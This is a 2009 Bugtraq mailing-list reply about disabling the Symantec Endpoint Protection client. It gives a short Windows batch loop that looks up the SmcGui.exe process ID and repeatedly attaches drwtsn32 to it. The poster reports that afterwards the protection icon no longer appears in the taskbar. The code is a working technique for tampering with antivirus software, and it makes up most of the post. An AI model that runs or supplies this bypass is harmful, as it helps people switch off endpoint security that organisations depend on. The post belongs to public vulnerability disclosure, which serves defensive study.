Date: Fri, 13 Feb 2009 20:06:24 +0530
From: "Sandeep Cheema" <51l3n7@...e.in>
To: <bugtraq@...urityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f

For the "users" its working for SmcGUI.exe

Please find the code as below.

:here
tasklist | find /i "SmcGui.exe" > c:\pid.txt
FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
drwtsn32 -p %pidopt%
goto :here

I have tried it and when let this file run for around 2 mins, The SmcGui.exe
process loads up when you logoff and log back in (or restart)but the icon
does not show up in the taskbar.

Thank you.

Regards, Sandeep